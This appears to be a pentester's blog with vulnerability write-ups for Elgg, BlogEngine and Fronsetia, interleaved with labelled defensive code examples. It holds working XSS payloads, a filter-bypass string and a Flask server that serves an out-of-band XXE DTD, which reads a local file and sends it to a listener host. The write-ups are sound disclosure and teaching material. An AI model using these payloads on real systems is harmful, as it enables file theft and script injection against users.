MSecure

Thursday, 12 February 2026
Paper - Attacking XAMPP Installs
Have released a paper for attacking and exploiting XAMPP installs :) Link is below.
https://seclists.org/fulldisclosure/2026/Jan/28
Saturday, 24 January 2026
Friday Fun Pentest Series - 48 - Weak Password Complexity - elggv6.3.3
Description
- It was noted that the "Password Update" functionality allowed users to set weak passwords.
Weak Password Complexity
Steps to Reproduce:
- Visit profile page and change the password to "Passw0rd!"
// HTTP Request - Changing Password
POST /action/usersettings/save HTTP/1.1
Host: elgg.local
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.9
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 216
Origin: http://elgg.local
Sec-GPC: 1
Connection: keep-alive
Referer: http://elgg.local/settings/user/admin
Cookie: Elgg=5ivi0vt1g9jqu1sju70hfnm0mc
Upgrade-Insecure-Requests: 1
Priority: u=0, i
__elgg_token=nIY_M_wh53bUxoHvuKO1YA&__elgg_ts=1769266299&username=admin&name=Admin+User&email_password=&email=admin@example.com&current_password=[REDACTED]&password=Passw0rd%21&password2=Passw0rd%21&language=en&guid=46
// HTTP Response - Changing Password
HTTP/1.1 302 Found
Date: Sat, 24 Jan 2026 14:52:07 GMT
Server: Apache/2.4.52 (Ubuntu)
Cache-Control: must-revalidate, no-cache, no-store, private
expires: Thu, 19 Nov 1981 08:52:00 GMT
pragma: no-cache
Location: http://elgg.local/settings/user/admin
Vary: User-Agent
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 394
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8" />
<meta http-equiv="refresh" content="0;url='http://elgg.local/settings/user/admin'" />
<title>Redirecting to http://elgg.local/settings/user/admin</title>
</head>
<body>
Redirecting to <a href="http://elgg.local/settings/user/admin">http://elgg.local/settings/user/admin</a>.
</body>
</html>
// HTTP Request - Changing Password - Following Redirect
GET /settings/user/admin HTTP/1.1
Host: elgg.local
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.9
Accept-Encoding: gzip, deflate, br
Origin: http://elgg.local
Sec-GPC: 1
Connection: keep-alive
Referer: http://elgg.local/action/usersettings/save
Cookie: Elgg=5ivi0vt1g9jqu1sju70hfnm0mc
Upgrade-Insecure-Requests: 1
Priority: u=0, i
// HTTP Response - Changing Password - Following Redirect
HTTP/1.1 200 OK
Date: Sat, 24 Jan 2026 14:52:11 GMT
Server: Apache/2.4.52 (Ubuntu)
Cache-Control: must-revalidate, no-cache, no-store, private
x-frame-options: SAMEORIGIN
expires: Thu, 19 Nov 1981 08:52:00 GMT
pragma: no-cache
x-content-type-options: nosniff
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 27859
[...]
<div class="elgg-message elgg-message-success"><div class="elgg-inner"><div class="elgg-body">Password changed</div></div></div>
[...]
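A server-side policy check of the kind that would have rejected "Passw0rd!" in the exchange above. This is an added example, not Elgg's code; it follows the NIST SP 800-63B approach (a length floor plus a denylist of common base words, with leet-speak undone before the comparison) rather than composition rules, and the 12-character minimum and the short denylist are assumptions for illustration.

```python
import re
import unicodedata

MIN_LENGTH = 12  # assumption: the minimum this example's policy enforces

# Constructed denylist for the example; a deployment would load a large
# breached-password corpus instead of these few base words.
COMMON_BASE_WORDS = {"password", "qwerty", "letmein", "welcome", "admin", "elgg"}

# Undo the leet substitutions that make "Passw0rd!" look unlike "password".
LEET_MAP = str.maketrans({"0": "o", "1": "i", "3": "e", "4": "a",
                          "5": "s", "7": "t", "@": "a", "$": "s"})


def normalize(password: str) -> str:
    """Lower-case, undo leet-speak and drop everything but letters, so that
    'Passw0rd!' collapses to 'password' before the dictionary comparison."""
    lowered = unicodedata.normalize("NFKC", password).lower()
    return re.sub(r"[^a-z]", "", lowered.translate(LEET_MAP))


def check_password(password: str, username: str = "") -> list[str]:
    """Return the policy violations for a candidate password; an empty list
    means the password is accepted."""
    problems = []
    if len(password) < MIN_LENGTH:
        problems.append(f"shorter than {MIN_LENGTH} characters")
    norm = normalize(password)
    for word in sorted(COMMON_BASE_WORDS):
        # A denylisted word plus at most three extra letters is still the same
        # guessable password ("password1", "Passw0rd!", "welcome2024").
        if word in norm and len(norm) - len(word) <= 3:
            problems.append(f"based on the common word '{word}'")
            break
    if username and username.lower() in password.lower():
        problems.append("contains the username")
    return problems
```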
Friday Fun Pentest Series - 47 - Username Enumeration - elggv6.3.3
Description
- It was noted that the "Forgot Password" functionality was vulnerable to "Username Enumeration"
Username Enumeration
Steps to Reproduce:
- Enter a valid user and observe the HTTP response
- Enter an invalid user and observe the HTTP response
// HTTP Request - Resetting Password - Valid User
POST /action/user/requestnewpassword HTTP/1.1
Host: elgg.local
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.9
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 71
Origin: http://elgg.local
Sec-GPC: 1
Connection: keep-alive
Referer: http://elgg.local/forgotpassword
Cookie: Elgg=3v9mqlh8vai2f9hemfo7iqttt6
Upgrade-Insecure-Requests: 1
Priority: u=0, i
__elgg_token=2Cpt0GyVW9swhLkm5PggkQ&__elgg_ts=1769264047&username=admin
// HTTP Response - Resetting Password - Valid User
HTTP/1.1 302 Found
Date: Sat, 24 Jan 2026 14:14:43 GMT
Server: Apache/2.4.52 (Ubuntu)
Cache-Control: must-revalidate, no-cache, no-store, private
expires: Thu, 19 Nov 1981 08:52:00 GMT
pragma: no-cache
Location: http://elgg.local/
Vary: User-Agent
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 318
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8" />
<meta http-equiv="refresh" content="0;url='http://elgg.local/'" />
<title>Redirecting to http://elgg.local/</title>
</head>
<body>
Redirecting to <a href="http://elgg.local/">http://elgg.local/</a>.
</body>
</html>
// HTTP Request - Following Redirection - Valid User
GET / HTTP/1.1
Host: elgg.local
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.9
Accept-Encoding: gzip, deflate, br
Origin: http://elgg.local
Sec-GPC: 1
Connection: keep-alive
Referer: http://elgg.local/action/user/requestnewpassword
Cookie: Elgg=3v9mqlh8vai2f9hemfo7iqttt6
Upgrade-Insecure-Requests: 1
Priority: u=0, i
// HTTP Response - Following Redirection - Valid User
HTTP/1.1 200 OK
Date: Sat, 24 Jan 2026 14:14:46 GMT
Server: Apache/2.4.52 (Ubuntu)
Cache-Control: must-revalidate, no-cache, no-store, private
x-frame-options: SAMEORIGIN
expires: Thu, 19 Nov 1981 08:52:00 GMT
pragma: no-cache
x-content-type-options: nosniff
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 20646
[...]
<div class="elgg-message elgg-message-success"><div class="elgg-inner"><div class="elgg-body">Successfully requested a new password, email sent</div></div></div>
[...]
// HTTP Request - Resetting Password - Invalid User
POST /action/user/requestnewpassword HTTP/1.1
Host: elgg.local
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.9
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 67
Origin: http://elgg.local
Sec-GPC: 1
Connection: keep-alive
Referer: http://elgg.local/forgotpassword
Cookie: Elgg=3v9mqlh8vai2f9hemfo7iqttt6
Upgrade-Insecure-Requests: 1
Priority: u=0, i
__elgg_token=2Cpt0GyVW9swhLkm5PggkQ&__elgg_ts=1769264047&username=x
// HTTP Response - Resetting Password - Invalid User
HTTP/1.1 302 Found
Date: Sat, 24 Jan 2026 14:15:07 GMT
Server: Apache/2.4.52 (Ubuntu)
Cache-Control: must-revalidate, no-cache, no-store, private
expires: Thu, 19 Nov 1981 08:52:00 GMT
pragma: no-cache
Location: http://elgg.local/forgotpassword
Vary: User-Agent
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 374
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8" />
<meta http-equiv="refresh" content="0;url='http://elgg.local/forgotpassword'" />
<title>Redirecting to http://elgg.local/forgotpassword</title>
</head>
<body>
Redirecting to <a href="http://elgg.local/forgotpassword">http://elgg.local/forgotpassword</a>.
</body>
</html>
// HTTP Request - Following Redirection - Invalid User
GET /forgotpassword HTTP/1.1
Host: elgg.local
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.9
Accept-Encoding: gzip, deflate, br
Origin: http://elgg.local
Sec-GPC: 1
Connection: keep-alive
Referer: http://elgg.local/action/user/requestnewpassword
Cookie: Elgg=3v9mqlh8vai2f9hemfo7iqttt6
Upgrade-Insecure-Requests: 1
Priority: u=0, i
// HTTP Response - Following Redirection - Invalid User
HTTP/1.1 200 OK
Date: Sat, 24 Jan 2026 14:15:09 GMT
Server: Apache/2.4.52 (Ubuntu)
Cache-Control: must-revalidate, no-cache, no-store, private
x-frame-options: SAMEORIGIN
expires: Thu, 19 Nov 1981 08:52:00 GMT
pragma: no-cache
x-content-type-options: nosniff
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 19681
[...]
<div class="elgg-message elgg-message-error"><div class="elgg-inner"><div class="elgg-body">Username x not found.</div></div></div>
[...]
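A regression check for the difference shown above, plus the handler shape that removes it. This is an added example, not Elgg's code: the Resp records are constructed from the two responses captured above, and the neutral message text is an assumption.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Resp:
    status: int
    location: str
    message: str


# Constructed from the two exchanges captured above: same endpoint, same status,
# but the redirect target and the flash message reveal whether "admin" exists.
VALID_USER = Resp(302, "http://elgg.local/",
                  "Successfully requested a new password, email sent")
INVALID_USER = Resp(302, "http://elgg.local/forgotpassword",
                    "Username x not found.")


def enumeration_signals(valid: Resp, invalid: Resp) -> list[str]:
    """Name every observable field that differs between the two responses.
    A non-empty list means an unauthenticated caller can tell accounts apart.
    (A fuller harness would also compare response times.)"""
    return [field for field in ("status", "location", "message")
            if getattr(valid, field) != getattr(invalid, field)]


NEUTRAL = Resp(302, "http://elgg.local/",
               "If that account exists, a password reset email has been sent.")


def request_new_password(username: str, known_users: set[str],
                         outbox: list[str]) -> Resp:
    """Hardened handler shape: the response is identical whether or not the
    account exists; only the side effect depends on the lookup, and that side
    effect (queuing the mail) belongs off the request path so its cost does
    not leak through timing either."""
    if username in known_users:
        outbox.append(username)  # stands in for queuing the reset email
    return NEUTRAL
```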
Saturday, 14 December 2024
Friday Fun Pentest Series - 16 - Stored XSS with Filter Bypass - blogenginev3.3.8
Description
- It was found that the application was vulnerable to Stored XSS via a specific payload that bypassed the filtering in place.
Stored XSS Filter Bypass #1 - "Add Category"
Steps to Reproduce:
- Login as admin and go to "Content" > "Posts"
- On the right side of the page choose "Categories"
- In "Title" and "Description" paste the following payload <b>12345</b><script>alert(1)</script><b>12345=</b>
// HTTP PUT request
PUT /blogengine/api/posts/update/foo HTTP/1.1
Host: 192.168.58.153:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
[...]
[...]
","DateCreated":"2024-12-14 14:33","Slug":"xss","RelativeLink":"/blogengine/post/2024/12/14/xss","Categories":[{"IsChecked":false,"Id":"40a7136b-2f0d-491a-8690-2a092681ed3b","Title":"<b>12345</b><script>alert(1)</script><b>12345=</b>"}],"Tags":[],"Comments":null,"HasCommentsEnabled":true,"IsPublished":false,"IsDeleted":false,"CanUserDelete":true,"CanUserEdit":true}
[...]
// HTTP response
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Sat, 14 Dec 2024 15:34:08 GMT
Content-Length: 0
// HTTP GET request
GET /blogengine/post/2024/12/14/xss HTTP/1.1
Host: 192.168.58.153:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
[...]
// HTTP response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.5
x-pingback: http://192.168.58.153:8080/blogengine/pingback.axd
Content-Style-Type: text/css
Content-Script-Type: text/javascript
X-Powered-By: ASP.NET
Date: Sat, 14 Dec 2024 15:44:05 GMT
Content-Length: 19229
[...]
<span class="post-category"><a href="/blogengine/category/<b>12345<b><script>alert(1)<script><b>12345=<b>"><b>12345</b><script>alert(1)</script><b>12345=</b></a></span></div></header>
[...]
Thursday, 21 November 2024
Friday Fun Pentest Series - 15 - OOB XXE - fronsetiav1.1
Description
- The application is vulnerable to OOB XXE injection
XXE #1 - "show_operations.jsp"
Steps to Reproduce:
- Start a Python 3 server to serve the XXE payload (code below)
- Create the file on the file system that the XXE payload will read: echo 123123 > /tmp/123
- Enter the following URL as input
http://192.168.78.128:8080/fronsetia/show_operations.jsp?Fronsetia_WSDL=http://192.168.78.1:10000/testxxeService?wsdl
// Python Server Code
from flask import Flask, Response
import logging

app = Flask(__name__)

# Set up logging so each fetch by the target is visible on the console
logging.basicConfig(level=logging.DEBUG)


@app.route('/testxxeService')
def catch_all():
    # Answers the "?wsdl" fetch: the DOCTYPE pulls in the external DTD below via a parameter entity
    app.logger.debug("Serving XXE payload")
    xml = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
<!ENTITY % dtd SYSTEM "http://192.168.78.1:10000/data.dtd"> %dtd;
]>
<data>&send;</data>"""
    return Response(xml, mimetype='text/xml', status=200)


@app.route('/data.dtd')
def serve_dtd():
    # The external DTD: reads /tmp/123 and sends its content to the listener on port 8000
    app.logger.debug("DTD requested")
    xml = """<!ENTITY % file SYSTEM "file:///tmp/123">
<!ENTITY % eval "<!ENTITY % exfil SYSTEM 'http://192.168.78.1:8000/?content=%file;'>">
%eval;
%exfil;"""
    return Response(xml, mimetype='text/xml', status=200)


if __name__ == "__main__":
    app.run(host='0.0.0.0', port=10000)
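The consuming side of what the server above abuses: Fronsetia fetches a user-supplied WSDL location and parses whatever comes back, entities included. The gate below refuses any document that carries a DOCTYPE before it reaches the parser, which has the same effect as enabling the feature http://apache.org/xml/features/disallow-doctype-decl on a Java parser. This is an added example in Python, not Fronsetia's code; XXE_WSDL is the document the server above serves, and SAFE_WSDL is constructed.

```python
import re
import xml.etree.ElementTree as ET

# The WSDL the Flask server above returns, and a harmless minimal WSDL (constructed).
XXE_WSDL = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
<!ENTITY % dtd SYSTEM "http://192.168.78.1:10000/data.dtd"> %dtd;
]>
<data>&send;</data>"""
SAFE_WSDL = b"""<?xml version="1.0"?>
<definitions xmlns="http://schemas.xmlsoap.org/wsdl/" name="Hello"/>"""

# Comments and CDATA may legitimately contain the literal text "<!DOCTYPE".
_COMMENT_OR_CDATA = re.compile(rb"<!--.*?-->|<!\[CDATA\[.*?\]\]>", re.S)
_DOCTYPE = re.compile(rb"<!DOCTYPE\b", re.I)


def has_dtd(document: bytes) -> bool:
    """True if the document carries a DOCTYPE anywhere outside comments and CDATA.
    Every entity declaration (internal, external or parameter) needs a DOCTYPE,
    so refusing it shuts the door on classic and out-of-band XXE alike.
    Assumes an ASCII-compatible encoding; transcode UTF-16 input first."""
    return _DOCTYPE.search(_COMMENT_OR_CDATA.sub(b"", document)) is not None


def parse_untrusted(document: bytes) -> ET.Element:
    """Parse XML fetched from a user-supplied location only after the DTD gate."""
    if has_dtd(document):
        raise ValueError("DOCTYPE/DTD not allowed in untrusted XML")
    return ET.fromstring(document)


def is_rejected(document: bytes) -> bool:
    """Convenience for tests: does the gate refuse this document?"""
    try:
        parse_untrusted(document)
    except ValueError:
        return True
    return False
```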
Wednesday, 20 November 2024
Friday Fun Pentest Series - 14 - Reflected XSS - fronsetiav1.1
Description
- It was found that the application was vulnerable to Reflected XSS
Reflected XSS #1 - "show_operations.jsp"
Steps to Reproduce:
- Visit the main page of the application.
- In the "WSDL Location" input field, enter the following payload: "><img src=x onerror=alert(1)>
// HTTP GET Request
GET /fronsetia/show_operations.jsp?Fronsetia_WSDL=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E HTTP/1.1
Host: 192.168.78.128:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:133.0) Gecko/20100101 Firefox/133.0
[...]
// HTTP Response
HTTP/1.1 200
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 6360
Date: Wed, 20 Nov 2024 19:42:15 GMT
Keep-Alive: timeout=20
Connection: keep-alive
[...]
<title> Fronsetia: "><img src=x onerror=alert(1)> </title>
[...]
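Context-specific output encoding for the two injection points in this post and in the BlogEngine stored XSS post above (the Fronsetia <title> and the category anchor). This is an added example, not code from either project; the render functions assume the markup shapes visible in the captured responses, and tags_in shows what an HTML parser sees in the result.

```python
import html
from html.parser import HTMLParser
from urllib.parse import quote

# Payloads recorded in the two posts above (Stored XSS #1 and Reflected XSS #1).
STORED_CATEGORY = "<b>12345</b><script>alert(1)</script><b>12345=</b>"
REFLECTED_WSDL = '"><img src=x onerror=alert(1)>'


def render_category_link(title: str) -> str:
    """Render the BlogEngine category anchor with the title encoded separately
    for each context it lands in: percent-encoding inside the URL path, entity
    encoding for the attribute value and again for the link text."""
    href = "/blogengine/category/" + quote(title, safe="")
    return (f'<span class="post-category"><a href="{html.escape(href)}">'
            f"{html.escape(title)}</a></span>")


def render_title(wsdl_location: str) -> str:
    """Render the Fronsetia <title> with the reflected WSDL value entity-encoded."""
    return f"<title> Fronsetia: {html.escape(wsdl_location)} </title>"


class _TagCollector(HTMLParser):
    def __init__(self) -> None:
        super().__init__()
        self.tags: list[str] = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def tags_in(markup: str) -> list[str]:
    """Start tags an HTML parser finds in the markup; user data must add none."""
    collector = _TagCollector()
    collector.feed(markup)
    return collector.tags
```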
Thursday, 7 November 2024
It's Official - BSCP Certified
It's official. I'm BSCP (Burp Suite Certified Practitioner) certified. Took me a few tries to pass :)
Key takeaways from the attempts:
- Don't give up
- It's a difficult exam
- Check all the relevant labs in the PortSwigger Academy
- Check for bypasses in the Academy labs
- Make sure to have a good list of notes such as payloads and bypasses ready
That's it folks!